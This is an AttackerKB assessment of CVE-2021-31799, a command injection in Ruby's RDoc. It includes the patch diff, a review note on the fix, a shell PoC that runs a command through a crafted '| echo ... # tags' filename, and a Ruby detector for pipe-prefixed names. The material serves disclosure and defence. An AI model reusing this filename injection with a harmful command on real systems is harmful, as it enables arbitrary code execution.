AttackerKB AKB:68A73D22-2393-46F2-ACF6-868546F68E29
Jul 30, 2021 - 12:00 a.m.

CVE-2021-31799

attackerkb.com

In RDoc 3.11 through 6.x before 6.3.1, as distributed with Ruby through 3.0.1, it is possible to execute arbitrary code via | and tags in a filename.

Recent assessments:

wvu-r7 at May 03, 2021 1:43am UTC reported:

CVE-2021-31799

Perlisms strike again in this RDoc command injection. Kernel#open is not safe.

Patch

File is lib/rdoc/rdoc.rb.

   ##
   # Removes file extensions known to be unparseable from +files+ and TAGS
   # files for emacs and vim.

   def remove_unparseable files
     files.reject do |file, *|
       file =~ /\.(?:class|eps|erb|scpt\.txt|svg|ttf|yml)$/i or
         (file =~ /tags$/i and
-         open(file, 'rb') { |io|
+         File.open(file, 'rb') { |io|
            io.read(100) =~ /\A(\f\n[^,]+,\d+$|!_TAG_)/
          })
     end
   end
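Review bot: the one-line swap from open(file, 'rb') to File.open(file, 'rb') is the whole fix, but nothing in the hunk says why, so a later cleanup could revert it; add a comment above that line recording that Kernel#open treats a name beginning with "|" as a command to spawn, whereas File.open only ever opens a path, which is the property this check needs because +file+ comes from the filesystem listing and is attacker-controlled. The doc comment above remove_unparseable could also say that the 100-byte read is performed on any file whose name ends in "tags", so the same File.open rule applies to any future caller-supplied name in this method.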

PoC

wvu@kharak:~/Downloads/poc$ cat vulnerable
cat: vulnerable: No such file or directory
wvu@kharak:~/Downloads/poc$ touch "| echo HACK THE PLANET > vulnerable # tags"
wvu@kharak:~/Downloads/poc$ rdoc
Parsing sources...
100% [ 1/ 1]  | echo HACK THE PLANET > vulnerable # tags

Generating Darkfish format into /Users/wvu/Downloads/poc/doc...

  Files:      1

  Classes:    0 (0 undocumented)
  Modules:    0 (0 undocumented)
  Constants:  0 (0 undocumented)
  Attributes: 0 (0 undocumented)
  Methods:    0 (0 undocumented)

  Total:      0 (0 undocumented)
    0.00% documented

  Elapsed: 0.1s

wvu@kharak:~/Downloads/poc$ cat vulnerable
HACK THE PLANET
wvu@kharak:~/Downloads/poc$

Assessed Attacker Value: 4
Assessed Attacker Value: 3
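Added example (not RDoc's or the assessor's code) that puts the patched tags check beside a detector for the filename shape the PoC relies on: a name starting with "|" is what Kernel#open would spawn as a command, while File.open reads it as an ordinary path. The filenames and the temporary directory are constructed here; unparseable? mirrors the reject condition from the patched remove_unparseable.

```ruby
require 'tmpdir'

# True when Kernel#open would treat +name+ as a command rather than a path:
# Kernel#open spawns a subprocess whenever the string begins with "|".
# Useful as a pre-check or log filter; this code never calls Kernel#open.
def pipe_filename?(name)
  name.is_a?(String) && name.start_with?('|')
end

# Reject condition from the patched RDoc method, using File.open so that a
# "| cmd # tags" name is opened as a file (or raises Errno::ENOENT), never run.
def unparseable?(file)
  return true if file =~ /\.(?:class|eps|erb|scpt\.txt|svg|ttf|yml)$/i
  return false unless file =~ /tags$/i
  File.open(file, 'rb') do |io|
    head = io.read(100).to_s   # read returns nil on an empty file; to_s guards it
    !!(head =~ /\A(\f\n[^,]+,\d+$|!_TAG_)/)
  end
end

# Runs the check in a scratch directory holding constructed files and reports
# what happened, including whether the PoC's marker file ever appeared.
def demo
  Dir.mktmpdir do |dir|
    Dir.chdir(dir) do
      evil = '| echo HACK THE PLANET > vulnerable # tags'  # same shape as the PoC
      File.write(evil, 'just text')                        # a real file with that name
      File.write('tags', "!_TAG_FILE_FORMAT\t2\n")         # a genuine ctags file
      File.write('notes.txt', 'hi')
      {
        pipe_flagged:     pipe_filename?(evil),            # detector fires on the name
        evil_unparseable: unparseable?(evil),              # read as a file: contents are plain text
        spawned:          File.exist?('vulnerable'),       # no command ran, so no marker file
        real_tags:        unparseable?('tags'),            # genuine tags file is rejected
        plain:            unparseable?('notes.txt'),       # ordinary source file is kept
        missing:          (unparseable?('| true # tags') rescue :enoent) # File.open on a missing pipe-name
      }
    end
  end
end
```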